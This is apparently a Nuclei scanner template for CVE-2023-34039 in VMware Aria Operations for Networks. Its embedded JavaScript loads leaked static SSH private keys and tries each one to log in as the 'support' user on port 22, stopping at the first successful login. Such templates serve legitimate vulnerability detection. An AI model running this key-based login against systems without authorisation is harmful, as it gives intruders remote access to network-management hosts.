nuclei-templates/javascript/cves/2023/CVE-2023-34039.yaml

68 lines
2.6 KiB
YAML

id: CVE-2023-34039
info:
name: VMWare Aria Operations - Remote Code Execution
author: tarunKoyalwar
severity: critical
description: |
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
Version: All versions from 6.0 to 6.10
impact: |
Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
reference:
- https://github.com/sinsinology/CVE-2023-34039.git
- https://nvd.nist.gov/vuln/detail/CVE-2023-34039
- http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
- https://www.vmware.com/security/advisories/VMSA-2023-0018.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34039
cwe-id: CWE-327
epss-score: 0.92573
epss-percentile: 0.98742
cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: vmware
product: aria_operations_for_networks
tags: packetstorm,cve,cve2019,vmware,aria,rce
variables:
keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory
javascript:
# init field can be used to make any preperations before the actual exploit
# here we are reading all private keys from helpers folder and storing them in a list
- init: |
let m = require('nuclei/fs');
let privatekeys = m.ReadFilesFromDir(keysDir)
updatePayload('keys',privatekeys)
# check if port is open before bruteforcing
pre-condition: |
isPortOpen(Host,Port)
# actual exploit
code: |
let m = require('nuclei/ssh')
let c = m.SSHClient()
c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
args:
Host: "{{Host}}"
Port: "22"
key: "{{keys}}"
keysDir: "{{keysDir}}"
payloads:
# 'keys' will be updated by actual private keys after init is executed
keys:
- dummy1
- dummy2
threads: 10
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- success && response
# digest: 4b0a0048304602210087aff1b5bf114b23c7868a4202c15778db364336869344204cb346a3f7589725022100ecd35ce17efac50adba6b0e69416ad16ec3776e9ecabf4d37237b68f59ba46cb:922c64590222798bb761d5b6d8e72950